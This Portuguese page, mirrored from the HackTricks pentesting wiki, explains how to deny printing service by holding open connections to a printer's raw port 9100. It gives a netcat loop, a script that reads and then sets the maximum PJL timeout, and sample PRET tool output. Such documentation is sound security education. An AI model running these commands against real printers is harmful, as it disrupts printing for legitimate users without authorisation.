mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-25 12:33:39 +00:00
60 lines
4 KiB
Markdown
60 lines
4 KiB
Markdown
|
<details>
|
|||
|
|
|||
|
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|||
|
|
|||
|
Outras formas de apoiar o HackTricks:
|
|||
|
|
|||
|
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|||
|
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|||
|
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|||
|
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
|
|||
|
|
|||
|
</details>
|
|||
|
|
|||
|
|
|||
|
Se os trabalhos de impressão são processados em série – o que se assume para a maioria dos dispositivos – apenas um trabalho pode ser tratado por vez. Se este trabalho não terminar efetivamente, o canal de impressão fica bloqueado até que um timeout seja acionado, impedindo que usuários legítimos imprimam.
|
|||
|
|
|||
|
DoS Básico:
|
|||
|
```bash
|
|||
|
while true; do nc printer 9100; done
|
|||
|
```
|
|||
|
Este ataque trivial de negação de serviço pode ser aprimorado **definindo um valor alto de timeout com PJL**, assim o número de conexões que um atacante precisa fazer é minimizado enquanto fica ainda mais difícil para usuários legítimos conseguirem um intervalo de tempo livre:
|
|||
|
```bash
|
|||
|
# get maximum timeout value with PJL
|
|||
|
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
|
|||
|
grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
|
|||
|
# connect and set maximum timeout for current job with PJL
|
|||
|
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done
|
|||
|
```
|
|||
|
Você pode usar o [PRET](https://github.com/RUB-NDS/PRET) para encontrar as configurações de timeout:
|
|||
|
```bash
|
|||
|
./pret.py -q printer pjl
|
|||
|
Connection to printer established
|
|||
|
|
|||
|
Welcome to the pret shell. Type help or ? to list commands.
|
|||
|
printer:/> env timeout
|
|||
|
TIMEOUT=15 [2 RANGE]
|
|||
|
5
|
|||
|
300
|
|||
|
```
|
|||
|
Enquanto a referência PJL especifica um tempo máximo de espera de 300 segundos, na prática os tempos máximos de espera PJL podem variar de 15 a 2147483 segundos.
|
|||
|
Observe que mesmo os trabalhos de impressão recebidos de outros canais de impressão como IPP ou LPD não são mais processados enquanto a conexão permanecer aberta.
|
|||
|
|
|||
|
**Saiba mais sobre este ataque em** [**http://hacking-printers.net/wiki/index.php/Transmission\_channel**](http://hacking-printers.net/wiki/index.php/Transmission\_channel)
|
|||
|
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|||
|
|
|||
|
Outras formas de apoiar o HackTricks:
|
|||
|
|
|||
|
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|||
|
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|||
|
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|||
|
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
|
|||
|
|
|||
|
</details>
|